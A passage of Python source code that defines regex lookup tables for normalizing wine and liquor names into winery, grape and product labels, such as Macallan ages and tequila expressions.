('David Arthur', re.compile(r'\bDavid\s+Arthur\b', re.IGNORECASE)),
('David Bruce', re.compile(r'\bDavid\s+Bruce\b', re.IGNORECASE)),
('Davis Family', re.compile(r'\bDavis\s+Family\b', re.IGNORECASE)),
('Del Dotto', re.compile(r'\bDel\s+Dotto\b', re.IGNORECASE)),
('Dominus', re.compile(r'\bDominus\b', re.IGNORECASE)),
('Goldeneye', re.compile(r'\bGoldeneye\b', re.IGNORECASE)), # before duckhorn
('Paraduxx', re.compile(r'\bParaduxx\b', re.IGNORECASE)), # before duckhorn
('Domaine Carneros', re.compile(r'\bDomaine\s+Carneros\b', re.IGNORECASE)),
('Dominus', re.compile(r'\Dominus\b', re.IGNORECASE)),
('Drappier', re.compile(r'\bDrappier\b', re.IGNORECASE)),
('Duckhorn', re.compile(r'\bDuckhorn\b', re.IGNORECASE)),
('Dumol', re.compile(r'\bDumol\b', re.IGNORECASE)),
('Dunn', re.compile(r'\bDunn\b', re.IGNORECASE)),
('Ehlers', re.compile(r'\bEhlers\b', re.IGNORECASE)),
('Etude', re.compile(r'\bEtude\b', re.IGNORECASE)),
('Far Niente', re.compile(r'\bFar Niente\b', re.IGNORECASE)),
('Flora', re.compile(r'\bFlora\s+Springs\b', re.IGNORECASE)),
('Flowers', re.compile(r'\bFlowers\b', re.IGNORECASE)),
('Robert Foley', re.compile(r'\bRobert\s+\bFoley\b', re.IGNORECASE)), #before Foley
('Foley', re.compile(r'\bFoley\b', re.IGNORECASE)),
('Foxen', re.compile(r'\bFoxen\b', re.IGNORECASE)),
('Franciscan', re.compile(r'\bFranciscan\b', re.IGNORECASE)),
('Frank Family', re.compile(r'\bFrank Family\b', re.IGNORECASE)),
('Gary Farrell', re.compile(r'\bGary\s+Farrel+\b', re.IGNORECASE)),
('Ghost Block', re.compile(r'\bGhost\s+Block\b', re.IGNORECASE)),
('Grgich', re.compile(r'\bGrgich\b', re.IGNORECASE)),
('Groth', re.compile(r'\bGroth\b', re.IGNORECASE)),
('Gundlach', re.compile(r'\bGundlach\b', re.IGNORECASE)),
('Hansel', re.compile(r'\bHansel\b', re.IGNORECASE)),
('Hanzell', re.compile(r'\bHanzell\b', re.IGNORECASE)),
('Hess', re.compile(r'\bHess\b', re.IGNORECASE)),
('Hewitt', re.compile(r'\bHewitt\b', re.IGNORECASE)),
('Hobbs', re.compile(r'\bHobbs\b|\bcrossbarn\b', re.IGNORECASE)),
('Hundred Acre', re.compile(r'\bHundred\s+Acre\b', re.IGNORECASE)),
('Jordan', re.compile(r'\bJordan\b', re.IGNORECASE)),
('Justin', re.compile(r'\bJustin\b', re.IGNORECASE)),
('Kim Crawford', re.compile(r'\bKim\s+Crawford\b', re.IGNORECASE)),
('Kistler', re.compile(r'\bKistler\b', re.IGNORECASE)),
('Kosta', re.compile(r'\bKosta\s+Browne?\b', re.IGNORECASE)),
('Krug', re.compile(r'\bKrug\b', re.IGNORECASE)),
('Kunde', re.compile(r'\bKunde\b', re.IGNORECASE)),
('LaCrema', re.compile(r'\bLa\s?Crema\b', re.IGNORECASE)),
('Lewis', re.compile(r'\bLewis\b', re.IGNORECASE)),
('Lokoya', re.compile(r'\bLokoya\b', re.IGNORECASE)),
('Meiomi', re.compile(r'\bMeiomi\b', re.IGNORECASE)),
('Melville', re.compile(r'\bMelville\b', re.IGNORECASE)),
('Momento Mori', re.compile(r'\bMomento\s+Mori\b', re.IGNORECASE)),
('Mondavi', re.compile(r'\bMondavi\b', re.IGNORECASE)),
('Montelena', re.compile(r'\bMontelena\b', re.IGNORECASE)),
('Mt Veeder', re.compile(r'^Mount\s+Veeder\b|^Mt\.? Veeder\b|\d+\s+M[^t]*t\s+Veeder\b', re.IGNORECASE)),
('Newton', re.compile(r'\bNewton\b', re.IGNORECASE)),
('Nickel', re.compile(r'\bNickel\b', re.IGNORECASE)),
('Opus One', re.compile(r'\bOpus\s+One\b', re.IGNORECASE)),
('P Togni', re.compile(r'\bTogni\b', re.IGNORECASE)),
('Pahlmeyer Jayson', re.compile(r'\bJayson\b', re.IGNORECASE)), # this before pahlmeyer
('Pahlmeyer', re.compile(r'\bPahlmeyer\b(?!\s*Jay)', re.IGNORECASE)),
('Papillon', re.compile(r'\bPapillon\b', re.IGNORECASE)),
('Patz', re.compile(r'\bPatz\b', re.IGNORECASE)),
('Phelps', re.compile(r'\bPhelps\b', re.IGNORECASE)),
('Plumpjack', re.compile(r'\bPlumpjack\b', re.IGNORECASE)),
('Pride', re.compile(r'\bPride\b', re.IGNORECASE)),
('Prisoner', re.compile(r'\bPrisoner\b', re.IGNORECASE)),
('Provenance', re.compile(r'\bProvenance\b', re.IGNORECASE)),
('R Sinskey', re.compile(r'\bSinskey\b', re.IGNORECASE)),
('Ramey', re.compile(r'\bRamey\b', re.IGNORECASE)),
('Revana', re.compile(r'\bRevana\b', re.IGNORECASE)),
('Raptor', re.compile(r'\bRaptor\s+Ridge\b', re.IGNORECASE)),
('Revana', re.compile(r'\bRevana\b', re.IGNORECASE)),
('Ridge', re.compile(r'\bRidge\b', re.IGNORECASE)),
('Robert Foley', re.compile(r'\bRobert\s+Foley\b', re.IGNORECASE)),
('Rombauer', re.compile(r'\bRombauer\b', re.IGNORECASE)),
('Rudd', re.compile(r'\bRudd\b', re.IGNORECASE)),
('Scarecrow', re.compile(r'\bScarecrow\b', re.IGNORECASE)),
('Sea Smoke', re.compile(r'\bSea\s+Smoke\b', re.IGNORECASE)),
('Seghesio', re.compile(r'\bSeghesio\b', re.IGNORECASE)),
('Shafer', re.compile(r'\bShafer\b', re.IGNORECASE)),
('Sherwin', re.compile(r'\bSherwin\b', re.IGNORECASE)),
('Silver Oak', re.compile(r'\bSilver\s+Oak\b', re.IGNORECASE)),
('Silverado', re.compile(r'\bSilverado\b', re.IGNORECASE)),
('Simi', re.compile(r'\bSimi\b', re.IGNORECASE)),
('Sonoma Cutrer', re.compile(r'\bCutrer\b', re.IGNORECASE)),
('Spottswoode', re.compile(r'\bSpottswoode\b', re.IGNORECASE)),
('Stag Leap', re.compile(r'\bStag.*\sLeap\b', re.IGNORECASE)),
('Sullivan', re.compile(r'\bSullivan\b', re.IGNORECASE)),
('Summerland', re.compile(r'\bSummerland\b', re.IGNORECASE)),
('Summers', re.compile(r'\bSummers\b', re.IGNORECASE)),
('Tantara', re.compile(r'\bTantara\b', re.IGNORECASE)),
('Turnbull', re.compile(r'\bTurnbull\b', re.IGNORECASE)),
('Veuve', re.compile(r'\bVeuve\b', re.IGNORECASE)),
('Viader', re.compile(r'\bViader\b', re.IGNORECASE)),
('Waterstone', re.compile(r'\bWaterstone\b', re.IGNORECASE)),
('Whitehall', re.compile(r'\bWhitehall\b', re.IGNORECASE)),
('Wm Selyem', re.compile(r'\bWilliams\s*\-?Selyem\b', re.IGNORECASE)),
('ZD', re.compile(r'\bZD\b', re.IGNORECASE)),
('Zaca', re.compile(r'\bZaca\b', re.IGNORECASE)),
('zBourbon Woodford Res', re.compile(r'\bWoodford\s+Reserve\b', re.IGNORECASE)),
('zBourbon Woodford Res', re.compile(r'\bWoodford\s+Rsv\b', re.IGNORECASE)),
('zCognac Courvoisier', re.compile(r'\bCourvoisier\b', re.IGNORECASE)),
('zCognac Hennessy', re.compile(r'\bHennesse?y\b', re.IGNORECASE)),
('zCognac Remy', re.compile(r'\bRemy\s+Martin\b|\bRemy\s+Louis', re.IGNORECASE)),
('zCointreau', re.compile(r'\bCointreau\b', re.IGNORECASE)),
('zGin Hendrick', re.compile(r'\bHendrick', re.IGNORECASE)),
('zGin Tanqueray', re.compile(r'\bTanqueray\b', re.IGNORECASE)),
('zRum Mt Gay', re.compile(r'\bMount\s+Gay\b|\bMt\s+Gay', re.IGNORECASE)),
('zRum Ron Zacapa', re.compile(r'\bRon\s+Zacapa\b', re.IGNORECASE)),
('zRye Hayden', re.compile(r'\bBasil\s+Hayden\b', re.IGNORECASE)),
('zSambuca', re.compile(r'\bSambuca\b', re.IGNORECASE)),
('zScotch Glenmorangie', re.compile(r'\bGlenmorangie\b', re.IGNORECASE)),
('zScotch Hibiki Harmony', re.compile(r'\bHibiki\s.*Harmony\b', re.IGNORECASE)),
('zScotch Hibiki', re.compile(r'\bHibiki\b(?!\s*Har)', re.IGNORECASE)),
('zScotch Macallan', re.compile(r'\bMacallan\b', re.IGNORECASE)),
('zTeq Campo Azul', re.compile(r'\bCampo\s+Azul\b', re.IGNORECASE)),
('zTeq Casamigos', re.compile(r'\bCasamigos\b', re.IGNORECASE)),
('zTeq Casino Azul', re.compile(r'\bCasino\s+Azul\b', re.IGNORECASE)),
('zTeq Clase Azul', re.compile(r'\bClase\s+Azul\b', re.IGNORECASE)),
('zTeq Cuervo', re.compile(r'\bJose\s+Cuervo\b|^Cuervo\b', re.IGNORECASE)),
('zTeq Don Julio', re.compile(r'\bDon\s+Julio\b', re.IGNORECASE)),
('zTeq Dos Artes', re.compile(r'\bDos\s+Artes\b|^Cuervo\b', re.IGNORECASE)),
('zTeq Gran Cava', re.compile(r'\bGran\s+Cava\b', re.IGNORECASE)),
('zTeq Herradura', re.compile(r'\bHerradura\b', re.IGNORECASE)),
('zTeq Loma Azul', re.compile(r'\bLoma\s+Azul\b', re.IGNORECASE)),
('zTeq Padre Azul', re.compile(r'\bPadre\s+Azul\b', re.IGNORECASE)),
('zTeq Partida', re.compile(r'\bPartida\b', re.IGNORECASE)),
('zTeq Patron', re.compile(r'\bPatron\b', re.IGNORECASE)),
('zTripleSec Gr Marnier', re.compile(r'\bGrand\s+Marnier\b', re.IGNORECASE)),
('zTripleSec Dekuyper', re.compile(r'\bDekuyper\b', re.IGNORECASE)),
('zTripleSec Hiram', re.compile(r'\bHiram\b', re.IGNORECASE)),
('zVodka Absolut', re.compile(r'\bAbsolut\b', re.IGNORECASE)),
('zVodka Skyy', re.compile(r'\bSkyy\b', re.IGNORECASE)),
('zVodka Tito', re.compile(r'\bTito', re.IGNORECASE)),
('zWhiskey Balvenie', re.compile(r'\bBalvenie\b', re.IGNORECASE)),
('zWhiskey J Walker', re.compile(r'\bJohn+ie\s+Walker\b', re.IGNORECASE)),
# ('', re.compile(r'\b\b', re.IGNORECASE)),
)
# regex extract the grape from the wine fld
grapeLookup = (
('Cab Franc', re.compile(r'\bCabernet\s+Franc|\bCab\s+Franc', re.IGNORECASE)), # before cab
('Cab', re.compile(r'\bCabernet\b|\sCS\s|\sCS$|\bCab\b', re.IGNORECASE)),
('Claret', re.compile(r'\bClaret\b', re.IGNORECASE)),
('Rose Pinot', re.compile(r'\bRose\b.*\bPinot\b|\bPinot\b.*\bRose\b', re.IGNORECASE)),
('Pinot', re.compile(r'\bPinot\b|\bPN\b|\bP\s+Noir\b', re.IGNORECASE)),
('Merlot', re.compile(r'\bMerlot\b|\bME\b', re.IGNORECASE)),
('Sauv Blanc', re.compile(r'\bSauvignon\s+Blanc\b|\bSB\b', re.IGNORECASE)),
('Sauv Blanc', re.compile(r'\bSauvignon\/Fume\s+Blanc\b', re.IGNORECASE)),
('Meritage', re.compile(r'\bMeritage\b', re.IGNORECASE)),
('Fume', re.compile(r'\bFume\b|\bFumé', re.IGNORECASE)),
('Champagne', re.compile(r'\bChampagne\b', re.IGNORECASE)),
('Chard', re.compile(r'\bChar+d|\bCH\b', re.IGNORECASE)),
('Shiraz', re.compile(r'\bShiraz\b', re.IGNORECASE)),
('Syrah', re.compile(r'\bSyrah\b|\bSY\b',re.IGNORECASE)),
('Zin', re.compile(r'\bZinfandel\b|\bZIN\b|\bZN\b', re.IGNORECASE)),
('Rose', re.compile(r'\bRose\b|\bRosé', re.IGNORECASE)),
('Sangiovese', re.compile(r'\Sangiovese\b', re.IGNORECASE)),
# ('Brandy', re.compile(r'\bBrandy\b', re.IGNORECASE)),
('Gewurzt', re.compile(r'\bGew.rztraminer\b|\bGewürzt', re.IGNORECASE)),
('Malbec', re.compile(r'\bMalbec\b', re.IGNORECASE)),
('Viognier', re.compile(r'\bViognier\b', re.IGNORECASE)),
('Roussanne', re.compile(r'\bRoussanne\b', re.IGNORECASE)),
('Charbono', re.compile(r'\bCharbono\b', re.IGNORECASE)),
('PSirah', re.compile(r'\bPetite Sirah\b', re.IGNORECASE)),
('Cuvee', re.compile(r'\bCuvee\b', re.IGNORECASE)),
('Red', re.compile(r'\bRed\b|\bBordeaux\s+Blend\b', re.IGNORECASE)),
('Syrah-Cab', re.compile(r'\bSyrcab\b|\bsyrah[-\s\/]+cab', re.IGNORECASE)),
('Grenache', re.compile(r'\bGrenache\b', re.IGNORECASE)),
('Tempranillo', re.compile(r'\bTempranillo\b', re.IGNORECASE)),
)
# wineries that we don't want to look up the grape on
ignoreGrapeLookup = {
'Cristal' : ['Rose', None],
'Domaine Carneros' : ['Brut', None],
'Dominus' : [None],
'Papillon' : None,
'Paraduxx' : None,
'Veuve' : None,
'zCointreau' : None,
'zGin Hendrick' : None,
'zGin Tanqueray' : ['Ten', None],
'zTripleSec Gr Marnier' : ['1880', '100th', 'Cent', 'Quin', None],
'zTripleSec Dekuyper' : None,
'zTripleSec Hiram' : None,
'zVodka Skyy' : ['Citrus', None],
'zVodka Tito' : None,
# 'Prisoner' : ['Cuttings', 'Red', 'Derange', 'Saldo', 'Blindfold', None],
}
# winery to wine lookup when no grape is found in the wine name
#
# extract the wine name from a winery - when a field does not have a grape lookup for the row
# the name looked up and found will be the name used
noGrapeLookup = {
'Ehlers' : ['120-80'], # matches an abbreviations - and matches fldWineDescr
'Alban' : ['Pandora'],
'BV' : ['Tapestry', 'Latour'],
'Bennett Ln' : ['Maximus'],
'Bremer' : ['Austintatious'],
'Cain Five' : None,
'Colgin' : ['Cariad', 'IX'],
'Concha Don Melchor' : None,
'Continuum' : None,
'Darioush' : ['Duel', 'Darius'],
'Duckhorn' : ['Discussion'],
'Far Niente' : ['Dolce'],
'Flora' : ['Trilogy'],
'Franciscan' : ['Magnificat'],
'Grgich' : ['Violetta'],
'Gundlach' : ['Vintage Reserve'],
'Justin' : ['Isosceles'],
'Krug' : ['Generations'],
'Mondavi' : ['Maestro'],
'Newton' : ['Puzzle'],
'Opus One' : None,
'Phelps' : ['Insignia'],
'Prisoner' : ['Cuttings', 'Derange', 'Saldo', 'Blindfold'],
'Ridge' : ['Monte Bello'],
'Robert Foley' : ['Griffin'],
'Sullivan' : ['Coeur de Vigne'],
'Zaca' : ['ZThree', 'ZCuvee'],
'zCognac Courvoisier' : ['Napolean', 'VS', 'VSOP', 'XO'],
'zCognac Hennessy' : ['Paradis', 'Richard', 'VS', 'VSOP', 'XO', 'Master'],
'zCognac Remy' : ['1738', 'Louis XIII', 'VSOP', 'XO', 'VS'],
'zRum Ron Zacapa' : ['23', 'Negra', 'XO'],
'zRye Hayden' : ['Dark', 'Caribbean'],
'zScotch Hibiki Harmony' : None,
# 'zScotch Hibiki' : ['Toki', '12', '17', '21', '30'],
'zTeq Campo Azul' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado'],
'zTeq Casamigos' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado'],
'zTeq Casino Azul' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado', 'Silver'],
'zTeq Clase Azul' : ['Ultra', 'Extra Anejo', 'Anejo', 'Blanco', 'Reposado', 'Mezcal', 'Plata', 'Platino'],
'zTeq Dos Artes' : ['Extra Anejo'],
'zTeq Gran Cava' : ['Extra Anejo'],
'zTeq Loma Azul' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado'],
# 'zTeq Padre Azul' : ['Extra Anejo', 'Anejo', 'Blanco', 'Reposado'],
'zTeq Partida' : ['Blanco', 'Elegante'],
'zVodka Absolut' : ['Citron', 'Mandarin', 'Mandrin', 'Mango', 'Ruby', 'Vanilia', 'Raspberri', 'Grapevine', None],
'zWhiskey J Walker' : ['Double Black', 'Black', 'Blue', 'Gold', 'Green', 'Platinum', 'Red','Swing', 'White', '18', '21'],
}
# regex to use to determine if this is a liquor not a wine
#
# winery -> [ liquor, regex ]
# if there is no grape, and no noGrapeLookup found, but the winery has a liquorLookup
# use the list of lookups to find the additional infomratoin to add to the winery
#
liquorLookup = {
'zRum Mt Gay' : [
('1703 Mst', re.compile(r'\b1703\b', re.IGNORECASE)),
('BB', re.compile(r'\bBlack Barrel\b', re.IGNORECASE)),
('Eclipse Silver', re.compile(r'\bEclipse\s+Silver\b', re.IGNORECASE)),
('Eclipse', re.compile(r'\bEclipse\b', re.IGNORECASE)),
('Old Peat', re.compile(r'\bOld Peat', re.IGNORECASE)),
('Old Pot', re.compile(r'\bPot\s+Still\b', re.IGNORECASE)),
('Old', re.compile(r'\bOld\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
('XO Peat', re.compile(r'\bXO\b', re.IGNORECASE)),
],
'zScotch Glenmorangie' : [
('10', re.compile(r'\b10(YR)?\b', re.IGNORECASE)),
('14 Port', re.compile(r'14.+\bQuinta\b|14.+\bPort\b|\bQuinta\b.+14|\bPort\b.+14', re.IGNORECASE)),
('12 Bacalta', re.compile(r'\bBacalta\b', re.IGNORECASE)),
('12 Burgundy', re.compile(r'\bBurgundy\b', re.IGNORECASE)),
('12 Nectar', re.compile(r'\bNectar\b', re.IGNORECASE)),
('12 Port', re.compile(r'\bQuinta\b|\bPort\b', re.IGNORECASE)),
('12 Sherry', re.compile(r'\bLa\s?Santa\b|\bSherry\b', re.IGNORECASE)),
('12 Signet', re.compile(r'\bSignet\b', re.IGNORECASE)),
('15 Cadboll', re.compile(r'\bCadboll', re.IGNORECASE)),
('15', re.compile(r'\b15(YR)?\b', re.IGNORECASE)),
('18', re.compile(r'\b18(YR)?\b|\b18YEAR\b', re.IGNORECASE)),
('25 Astar', re.compile(r'\bAstar\b', re.IGNORECASE)),
('25', re.compile(r'\b25(YR)?\b', re.IGNORECASE)),
('Companta', re.compile(r'\bCompanta\b', re.IGNORECASE)),
('Finealta', re.compile(r'\bFinealta\b', re.IGNORECASE)),
('Milsean', re.compile(r'\bMilsean\b', re.IGNORECASE)),
('Sonnalta', re.compile(r'\bSonnalta\b', re.IGNORECASE)),
],
'zScotch Macallan' : [
('10 Fine', re.compile(r'\bFine.*\b10\b|\b10.*Fine')),
('10', re.compile(r'\b10\b')),
('12 Double Gold', re.compile(r'\bDbl\b.*Gold|\bDouble\b.*Gold', re.IGNORECASE)),
('12 Double', re.compile(r'\bDouble\s.*12(YR)?\b', re.IGNORECASE)),
('12 Double', re.compile(r'\b12\s.*Double\b', re.IGNORECASE)),
('12 Double', re.compile(r'\bDbl\b|\bDouble\b', re.IGNORECASE)),
('12 Edition 1', re.compile(r'\bEdition\s.*1\b', re.IGNORECASE)),
('12 Edition 2', re.compile(r'\bEdition\s.*2\b', re.IGNORECASE)),
('12 Edition 3', re.compile(r'\bEdition\s.*3\b', re.IGNORECASE)),
('12 Edition 4', re.compile(r'\bEdition\s.*4\b', re.IGNORECASE)),
('12 Sherry', re.compile(r'\b12\s.*Sherry\b|\bSherry\b\s.*\b12', re.IGNORECASE)),
('12 Triple', re.compile(r'\b12(YR)?\s.*Triple\b', re.IGNORECASE)),
('12 Triple', re.compile(r'\bTriple\s.*12\b', re.IGNORECASE)),
('12', re.compile(r'\b12(YR)?\b', re.IGNORECASE)),
('15 Triple', re.compile(r'\b15(YR)?\s.*Triple\b|Triple.+\b15(YR)?\b', re.IGNORECASE)),
('15 Fine', re.compile(r'\b15(YR)?\b.*\bFine\b', re.IGNORECASE)),
('15', re.compile(r'\b15(YR)?\b', re.IGNORECASE)),
('17 Sherry', re.compile(r'\b17(YR)?\s.*Sherry\b', re.IGNORECASE)),
('17 Fine', re.compile(r'\b17(YR)?\b.*\bFine\b', re.IGNORECASE)),
('17', re.compile(r'\b17(YR)?\b', re.IGNORECASE)),
('18 Sherry', re.compile(r'\b18(YR)?\s.*Sherry\b|Sherry\b.*18', re.IGNORECASE)),
('18 Triple', re.compile(r'\b18(YR)?\s.*Triple\b|Triple.+\b18(YR)?\b', re.IGNORECASE)),
('18 Fine', re.compile(r'\b18(YR)?\b.*\bFine\b', re.IGNORECASE)),
('18 Gran', re.compile(r'Gran\b.*\b18', re.IGNORECASE)),
('18', re.compile(r'\b18(YR)?\b', re.IGNORECASE)),
('21 Fine', re.compile(r'\b21.*Fine\b', re.IGNORECASE)),
('21', re.compile(r'\b21(YR)?\b', re.IGNORECASE)),
('25 Sherry', re.compile(r'\b25\s.*Sherry\b', re.IGNORECASE)),
('25', re.compile(r'\b25(YR)?\b')),
('30 Sherry', re.compile(r'\b30\s.*Sherry', re.IGNORECASE)),
('30 Triple', re.compile(r'\b30(YR)?\s.*Triple\b|Triple.+\b30(YR)?\b', re.IGNORECASE)),
('30 Fine', re.compile(r'\b30(YR)?\b.*\bFine\b|Fine.*30', re.IGNORECASE)),
('30', re.compile(r'\b30(YR)?\b')),
('Rare', re.compile(r'\bRare\b', re.IGNORECASE)),
],
'zTeq Cuervo' : [
('Especial Gold', re.compile(r'\bEspecial\b.*Gold\b|Gold.*Especial', re.IGNORECASE)),
('Especial Blue', re.compile(r'\bEspecial\b.*Blue\b', re.IGNORECASE)),
('Especial', re.compile(r'\bEspecial\b', re.IGNORECASE)),
('Familia Platino', re.compile(r'\bPlatino\b', re.IGNORECASE)),
('Familia Anejo', re.compile(r'\bFamilia\b|\bReserva\b', re.IGNORECASE)),
('Gold', re.compile(r'\bGold\b', re.IGNORECASE)),
('Reposado Lagavulin', re.compile(r'\bReposado.*Lagavulin', re.IGNORECASE)),
('Tradicional Anejo', re.compile(r'Tradicional.*Anejo|Anejo.*Tradicional', re.IGNORECASE)),
('Tradicional Reposado', re.compile(r'Tradicional.*Reposado|Reposado.*Tradicional', re.IGNORECASE)),
('Tradicional Silver', re.compile(r'\bTradicional\b', re.IGNORECASE)),
('Tradicional Silver', re.compile(r'\bTraditional\b', re.IGNORECASE)),
('Reposado', re.compile(r'\bReposado\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
],
'zTeq Don Julio' : [
('1942', re.compile(r'\b1942\b', re.IGNORECASE)),
('Real', re.compile(r'\bReal\b', re.IGNORECASE)),
('Anejo Claro 70th', re.compile(r'\b70th\b', re.IGNORECASE)),
('Anejo Claro', re.compile(r'\bAnejo\b\s*Claro\b', re.IGNORECASE)),
('Anejo', re.compile(r'\bAnejo\b', re.IGNORECASE)),
('Blanco', re.compile(r'\bBlanco\b', re.IGNORECASE)),
('Reposado Lagavulin', re.compile(r'\bRepo.+Lagvulin\b', re.IGNORECASE)),
('Reposado Dbl', re.compile(r'\bReposado.+Double\b', re.IGNORECASE)),
('Reposado Dbl', re.compile(r'\bReposado.+Dbl\b', re.IGNORECASE)),
('Reposado Dbl', re.compile(r'\bDouble.+Reposado\b', re.IGNORECASE)),
('Reposado Private', re.compile(r'\bReposado.+Private\b', re.IGNORECASE)),
('Reposado', re.compile(r'\bReposado\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
],
'zTeq Herradura' : [
('Ultra', re.compile(r'\bUltra\b', re.IGNORECASE)),
('Suprema', re.compile(r'\bSuprema\b', re.IGNORECASE)),
('Anejo', re.compile(r'\bAnejo\b', re.IGNORECASE)),
('Blanco', re.compile(r'\bBlanco\b', re.IGNORECASE)),
('Reposado Gold', re.compile(r'\bReposado\s+Gold\b|\bGold\s+Reposado\b', re.IGNORECASE)),
('Reposado Scotch', re.compile(r'\bReposado.+Scotch\b|\bScotch.+Reposado\b', re.IGNORECASE)),
('Reposado Port', re.compile(r'\bPort.+Reposado\b|\bReposado.+Port\b', re.IGNORECASE)),
('Reposado', re.compile(r'\bReposado\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
],
'zTeq Patron' : [
('Gran Piedra', re.compile(r'\bPiedra\b', re.IGNORECASE)),
('DELETE Roca DELETE', re.compile(r'\bRoca\b', re.IGNORECASE)),
('Anejo Extra Lalique', re.compile(r'\bLalique\b', re.IGNORECASE)),
('Anejo Extra 7yr', re.compile(r'\b7YR\b|\b7 anos\b|\b7 year\b', re.IGNORECASE)),
('Anejo Extra 5yr', re.compile(r'\b5YR\b|\b5 anos\b|\b5 year\b', re.IGNORECASE)),
('Anejo Extra 10yr', re.compile(r'\b10\b.+\bExtra\b|\bExtra\b.+10', re.IGNORECASE)),
('Anejo Extra', re.compile(r'\bExtra\s+Anejo\b', re.IGNORECASE)),
('Gran Anejo', re.compile(r'\bGran\s+Anejo\b', re.IGNORECASE)),
('Gran Anejo', re.compile(r'\bBurdeos\b', re.IGNORECASE)),
('Gran Smoky', re.compile(r'\bGran\s+.*Smoky\b', re.IGNORECASE)),
('Anejo', re.compile(r'\bAnejo\b', re.IGNORECASE)),
('Gran Platinum', re.compile(r'\bPlatinum\b', re.IGNORECASE)),
('Reposado', re.compile(r'\bReposado\b', re.IGNORECASE)),
('Silver LTD', re.compile(r'\bSilver.*Limited\b|\bLimited.*Silver\b', re.IGNORECASE)),
('Silver Estate', re.compile(r'\bEstate.*Silver\b|\bSilver.*Estate\b', re.IGNORECASE)),
('Silver', re.compile(r'\bSilver\b', re.IGNORECASE)),
('Blanco', re.compile(r'\bBlanco\b', re.IGNORECASE)),
# ('', re.compile(r'\b\b', re.IGNORECASE)),
],
'zTeq Padre Azul' : [
('Blanco', re.compile(r'\bsilver\b', re.IGNORECASE)),
],
'zWhiskey Balvenie' : [
('12 Double', re.compile(r'\bDouble.*12(YR)?\b', re.IGNORECASE)),
('12 Double', re.compile(r'\b12(YR)?\s.*Double', re.IGNORECASE)),
('12 First', re.compile(r'\b12(YR)?\s.*First', re.IGNORECASE)),
('12 USA', re.compile(r'\b12.*American|American.*12', re.IGNORECASE)),
('12 Toast', re.compile(r'\b12(YR)?\s.*Toast', re.IGNORECASE)),
('12', re.compile(r'\b12(YR)?\b', re.IGNORECASE)),
('14 Carib', re.compile(r'\b14(YR)?\s.*Carib', re.IGNORECASE)),
('14 Carib', re.compile(r'\b14(YR)?\s.*CB\s+Cask', re.IGNORECASE)),
('14 Carib', re.compile(r'\bCarr?ib', re.IGNORECASE)),
('14 Peat', re.compile(r'\b14(YR)?\s.*Peat', re.IGNORECASE)),
('15 Sherry', re.compile(r'\b15(YR)?\s.*Sherry\b', re.IGNORECASE)),
('15 Sherry', re.compile(r'\bSherry\s+.*15(YR)?\b', re.IGNORECASE)),
('15', re.compile(r'\b15(YR)?\b', re.IGNORECASE)),
('16 Triple', re.compile(r'\b16(YR)?\s.*Triple\b', re.IGNORECASE)),
('17 Sherry Double', re.compile(r'\b17(YR)?\s.*Sherry\s+Doub', re.IGNORECASE)),
('17 Sherry', re.compile(r'\b17(YR)?\s.*Sherry', re.IGNORECASE)),
('17 Double', re.compile(r'\b17(YR)?\s.*Double', re.IGNORECASE)),
('17 Double', re.compile(r'\bDouble.*17(YR)?\b', re.IGNORECASE)),
# 17 Double Sherry
# 17 Islay
# 17 New Oak
('17 Peat', re.compile(r'\b17(YR)?\s.*Peat', re.IGNORECASE)),
('17 Peat', re.compile(r'\bPeat.*17(YR)?\b', re.IGNORECASE)),
('17', re.compile(r'\b17(YR)?\b', re.IGNORECASE)),
('21 Port', re.compile(r'\b21.*Port', re.IGNORECASE)),
('21 Port', re.compile(r'\bPort.*21\b', re.IGNORECASE)),
('21', re.compile(r'21', re.IGNORECASE)),
('25', re.compile(r'\b25(YR)?\b', re.IGNORECASE)),
('30', re.compile(r'\b30(YR)?\b', re.IGNORECASE)),
('40', re.compile(r'\b40(YR)?\b', re.IGNORECASE)),
],
'zBourbon Woodford Res' : [
('Dbl', re.compile(r'\bDouble\b', re.IGNORECASE)),
('Derby', re.compile(r'\bDerby\b', re.IGNORECASE)),
('Rye Choc', re.compile(r'\bChocolate.*Rye\b', re.IGNORECASE)),
('Rye', re.compile(r'\bRye\b', re.IGNORECASE)),
('Brandy', re.compile(r'\bBrandy\b', re.IGNORECASE)),
('Batch', re.compile(r'\bBatch\b', re.IGNORECASE)),
('Barrel', re.compile(r'\bBarrel\b', re.IGNORECASE)),
('Master', re.compile(r'\bMasters?\b', re.IGNORECASE)),
('Malt', re.compile(r'\bMalt\b', re.IGNORECASE)),
('Maple', re.compile(r'\bMaple\b', re.IGNORECASE)),
('Wheat', re.compile(r'\bWheat\b', re.IGNORECASE)),
('', re.compile(r'\bWoodford\b', re.IGNORECASE)),
],
'zSambuca' : [
('Romana Black', re.compile(r'\bRomana.*\bBlack\b|\bBlack\s+Romana\b', re.IGNORECASE)),
('Romana', re.compile(r'\bRomana\b', re.IGNORECASE)),
('Di Amore', re.compile(r'\bdi Amore\b', re.IGNORECASE)),
],
'zScotch Hibiki' : [
('12', re.compile(r'\b12\s*YE?A?R\b', re.IGNORECASE)),
('17 Limited', re.compile(r'\b17\s*YE?A?R\b.+Limited', re.IGNORECASE)),
('17', re.compile(r'\b17\s*YE?A?R\b', re.IGNORECASE)),
('21 Limited', re.compile(r'\b21\s*YE?A?R\b.+Limited', re.IGNORECASE)),
('21', re.compile(r'\b21\s*YE?A?R\b', re.IGNORECASE)),
('30', re.compile(r'\b30\s*YE?A?R\b', re.IGNORECASE)),
]
}
# regex to expand out optional values in the optoinal values to find a match against wine fld
wineAbbrLookup = {
'120-80' : r'\bOne\s+Twenty\s+Over\s+Eighty\b',
'3Amigos' : r'\bThree\s+Amigos\b',
'3Palms' : r'\bThree\s+Palms\b',
'3Sister' : r'\bThree\s+Sisters?\b',
'4Barrell' : r'\b4[\-\s]Barrels?\b',
'Alex' : r'\bAlexander\b',
'And' : r'\bAnderson\b',
'Car' : r'\bCarneros\b',
'Carries' : r'\bCarrie',
'CC' : r'\bC\.?C\.?\s+Ranch\b',
'Clone4' : r'\bClone\s+4\b',
